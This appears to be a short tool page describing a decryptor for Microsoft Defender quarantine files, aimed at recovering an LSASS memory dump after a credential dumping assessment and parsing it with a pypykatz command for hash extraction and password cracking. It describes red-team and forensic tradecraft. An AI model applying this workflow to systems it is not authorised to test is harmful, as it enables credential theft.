Recovery lsass.dmp from Defender Quarantine

Decrypt Windows Defender quarantined files using Microsoft’s RC4 algorithm

During forensic investigations or red team operations, it's common for critical artifacts — such as memory dumps or credential caches — to be flagged and quarantined by Microsoft Defender. This is especially true for LSASS process dumps, which are often encrypted and stored under randomized names, making recovery a challenge.

This tool allows you to decrypt files quarantined by Microsoft Defender, restoring them to their original state for analysis.

🧪 Use Case

Imagine you're performing a credential dumping assessment in an Active Directory environment. You successfully dump the LSASS memory to lsass.dmp, but Windows Defender instantly quarantines it, encrypting and renaming the file.

Even if you recover the quarantined file manually, it's unreadable without decryption.

With this decryptor, you can restore the original lsass.dmp and proceed with offline analysis, such as:

  • Hash extraction

  • Password cracking

  • Memory analysis (e.g. with tools like pypykatz)

pypykatz lsa minidump lsass_decoded.bin

✨ Features

  • 🔑 Implements RC4 decryption with Microsoft’s custom key scheduling.

  • 📦 Recovers both the original file and its metadata.

  • ⏱️ Displays decryption duration for performance tracking.

  • 💡 Lightweight, no external dependencies, and cross-platform friendly.

🔗 GitHub: https://lnkd.in/dP4xjHEF You can combine this tool with: 🔗 GitHub: https://lnkd.in/dsv8VDDh

Last updated

Was this helpful?